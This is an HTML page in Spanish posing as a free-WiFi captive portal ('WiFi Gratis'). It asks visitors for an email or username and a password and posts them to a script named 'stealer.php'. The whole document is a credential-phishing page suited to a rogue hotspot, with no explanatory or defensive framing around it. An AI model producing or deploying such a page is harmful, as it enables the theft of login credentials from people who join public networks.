<!DOCTYPE html>
<html>
<head>
  <title>WiFi Gratis</title>
  <style>
    body { font-family: Arial; background: #f0f0f0; text-align: center; padding-top: 100px; }
    .box { background: white; padding: 20px; border-radius: 10px; display: inline-block; }
  </style>
</head>
<body>
  <div class="box">
    <h2>Iniciar sesión para acceder a WiFi Gratis</h2>
    <form action="stealer.php" method="post">
      <input type="text" name="username" placeholder="Email o Usuario"><br><br>
      <input type="password" name="password" placeholder="Contraseña"><br><br>
      <input type="submit" value="Entrar">
    </form>
  </div>
</body>
</html>